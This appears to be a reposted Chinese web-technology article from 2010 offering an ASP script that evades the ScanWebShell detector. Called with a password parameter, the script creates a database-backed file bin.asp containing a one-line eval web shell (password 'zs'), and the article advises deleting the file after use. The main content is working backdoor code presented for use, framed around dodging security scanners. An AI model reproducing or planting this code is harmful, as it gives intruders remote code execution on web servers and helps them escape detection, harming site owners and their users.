日期:2010-03-29 13:02:00 来源:本站整理
躲避ScanWebShell很简单的东西[网络技术]
本文“躲避ScanWebShell很简单的东西[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
利用办法:
直接拜候xxx.asp?bin=zs 会在当前目录下生成一个bin.asp.衔接密码为zs!
PS: 该文件可以躲避ScanWebShell,但是生成的bin.asp会被查杀,利用后请删除bin.asp!
<%
pass="zs"
If request("bin")= pass then
shell = "bin.asp"
Connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath(shell)
set connad=server.createobject("adox.catalog")
connad.create connstr
Set conn=server.createobject("Adodb.Connection")
conn.open connstr
conn.execute("create table cmd(shell text)")
conn.execute("insert into cmd (shell) values ('<"&Chr("37")&"e"&"val+request("""&pass&""")"&chr("37")&">')")
End If
%>
以上是“躲避ScanWebShell很简单的东西[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |
评论内容只代表网友观点,与本站立场无关!
评论摘要(共 0 条,得分 0 分,平均 0 分)
查看完整评论